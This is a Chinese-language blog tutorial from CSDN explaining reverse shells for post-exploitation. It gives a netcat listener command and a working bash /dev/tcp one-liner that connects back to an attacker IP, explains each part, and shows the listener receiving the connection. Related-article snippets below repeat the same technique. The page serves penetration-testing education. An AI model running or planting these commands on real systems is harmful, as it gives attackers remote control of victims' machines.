后渗透-反弹Shell

已于 2023-03-04 11:04:49 修改
阅读量143 收藏
点赞数
分类专栏: 后渗透 文章标签: 系统安全 网络安全 安全
于 2023-02-25 23:36:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43381463/article/details/129222094
版权

反弹Shell

0x00 理解

反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端

使用场景:

  • 目标机因防火墙受限,目标机器只能发送请求,不能接收请求。
  • 目标机端口被占用。
  • 目标机位于局域网,或IP会动态变化,攻击机无法直接连接。
  • 目标机随机可能性多,无法掌控

0x01 过程

1、攻击者主机开启监听

nc -lvp 4444
# 参数 l 代表入站,v 代表输出信息级别,p 指定监听的端口

2、目标机上运行反弹命令

bash -i >& /dev/tcp/192.168.112.1/4444 0>&1 

bash -i       # 打开一个交互的bash
>&           # 将标准错误输出合并并重定向到标准输出,也可以写成 &> 

/dev/tcp/192.168.112.1/4444       #意为调用socket,建立socket连接,其中192.168.112.1为要反弹到的主机IP,4444为端口

0>&1          # 标准输入重定向到标准输出,实现你与反弹出来的shell的交互,可以接受用户输入,0>&1 和 0<&1 是相同的作用

# /dev/tcp/ 是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。

3、成功后攻击者拿到目标机的shell

nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.112.1] from 192.168.112.188 [192.168.112.188] 60436

用什么权限的用户反弹,就拥有什么用户的权限

贫僧法号云空丶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透-反弹shell.pdf
10-28
这是一份学习笔记,各个文章的摘抄整合。比较全面的反弹shell方法
91-91.渗透测试-通过木马反弹shell(Linux).mp4
05-10
91-91.渗透测试-通过木马反弹shell(Linux).mp4
渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(゚益゚メ) 渗透测试
寻觅的博客
04-19 2384
文章目录相关博客反弹shell介绍Linux基础重定向标准文件操作符空文件联合使用常用反弹方式NetCat(NC)反弹正向NC反向NC 相关博客 Linux信息收集、渗透测试常用命令: https://xunmi.blog.csdn.net/article/details/114970239 Linux常用提权方法: https://xunmi.blog.csdn.net/article/details/115187418 渗透测试常用反弹shell方法(如何渗透测试反弹shell?: https://x
内网渗透之Linux反弹shell(三)
墨鱼菜鸡
09-10 221
目录 Linux反弹shell(三) 环境 05.3Python 06.1PHP 06.2PHP 07Ruby 08.1Telnet 08.2Telnet 09OpenSSL Linux反弹shell(三) 环境 kali 192.168.0.100 ubuntu ...
网络安全-反弹shell详解(攻击,检测与防御)
2401_84466336的博客
04-23 2957
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
linux服务器告警反弹shell行为
lanren312的博客
05-20 447
检测说明:进程sh的启动参数为 /bin/sh -c bash -i>& /dev/tcp/服务器iP/端口 0>&1,符合可疑进程参数的特性.发现有记录 * * * * * bash -i >& /dev/tcp/服务器iP/端口 0>&1。客户今天持续收到服务器告警,给出了可以参数信息。告警说明:Linux反弹shell行为。再去看cron日志,果然一分钟一次。果断将里面的内容清空,到此告警消失。
什么是反弹shell
qq_30503389的博客
06-06 1478
反弹Shell(Reverse Shell)是一种网络攻击技术,用于通过远程主机上的Shell(命令行终端)与攻击者建立连接,从而控制受攻击主机。攻击者通常在受攻击主机上以各种方式植入恶意代码(如后门程序),然后通过网络与该主机上运行的Shell建立反向连接,从而获得对该主机的完全控制权。反弹Shell技术通常是针对目标主机的防火墙和安全措施进行攻击。攻击者首先在目标主机上放置一个能够向外发起TCP或UDP连接的恶意程序,并将其设定为在特定条件下自动启动。
linux-ReverseShellasaService反弹shell即服务
08-13
在Linux环境中,"Reverse Shell as a Service"(反弹shell即服务)是一种安全研究中的技术,主要用于渗透测试和漏洞利用场景。反弹shell允许攻击者在远程系统上获得命令执行的通道,从而控制目标系统。这种技术通常...
82-82.渗透测试-CVE-2017-8464“震网三代 反弹shell演示课件.mp4
05-10
82-82.渗透测试-CVE-2017-8464“震网三代 反弹shell演示课件.mp4
89-89.渗透测试-通过木马反弹shell(Android).mp4
最新发布
05-10
89-89.渗透测试-通过木马反弹shell(Android).mp4
阿里云提示进程异常行为反弹SHELL 该怎么处理
网站安全专家
09-01 1403
也希望我们的解决过程分享,能帮到更多的人。当天我们SINESAFE收到客户的电话咨询,客户的平台、APP和H5端、以及后台遭到黑客入侵,并篡改了数据库里面的数据,导致平台的损失过万,详细询问了客户的平台架构以及部署的服务器数量,发现客户用的是Thinkphp架构开发,APP的API接口和H5端以及后台管理都是在该架构的基础上开发的,因为这套代码是客户从买来后找的第三方公司进行的二次开发,第三方开发公司对里面的代码后门并不清楚,很多低价卖源码的,肯定是有利益可图的。...
LINUX shell反弹篇(一)
胖虎的博客
10-26 2093
linux 之shell反弹的方法及原理
内网渗透之——内网转发(反弹shell、端口、代理)
热门推荐
wsnbbz的博客
04-03 1万+
目的 渗透测试中,我们往往会面对十分复杂的内网环境,比如最常用的防火墙,它会限制特定端口的数据包出入。 需要转发的情况 1.A可以访问B的80端口,但是不能访问B的3389端口。 2.A可以访问B,B可以访问C,但是A不可以访问C,需要通过B转发数据,让A和C进行通信。 代理方式 正向代理 正向代理是客户端主动访问服务器的端口 我们常说的代理就是指正向代理,正向代理的过程,它...
反弹shell原理与实现
ZL_1618的博客
03-08 1774
反弹shell(ReverseShell)是一种常用于网络攻击中的技术,其目的是让攻击者通过远程控制程序获取被攻击计算机的权限。反弹shell技术通常是通过在受害者计算机上运行一个程序(称为“后门”),将计算机的控制权传递给攻击者。攻击者可以使用该程序在远程计算机上执行命令并访问其文件系统、网络接口等资源。在反弹shell攻击中,攻击者通常首先在受害者计算机上安装一个后门程序,然后使用一个包含恶意代码的文件或链接来欺骗用户打开该文件或链接。
宝塔后渗透-添加用户_反弹shell
crowsec
12-05 3824
宝塔后渗透-添加用户_反弹shell
网络安全之反弹Shell
小飞的博客
04-12 1743
在网络安全和渗透测试领域,“正向Shell”(Forward Shell)和"反向Shell"(Reverse Shell)是两种常用的技术手段,用于建立远程访问目标计算机的会话。这两种技术都可以让攻击者在成功渗透目标系统后执行命令,但它们在建立连接的方式上有所不同。
各种shell反弹方法
weixin_46626737的博客
05-16 2494
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
安全技术系列之反弹Shell
好记性不如烂笔头
03-13 2327
常用反弹shell技术汇总
linux内网渗透反弹shell
08-03
在Linux内网渗透中,反弹shell是一种常见的技术手段。其中,Bash反弹shell是最简单且最常见的一种方式。首先,在攻击机上使用nc命令监听一个端口。然后,在目标机器上使用Python脚本去反向连接攻击机的IP和端口。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值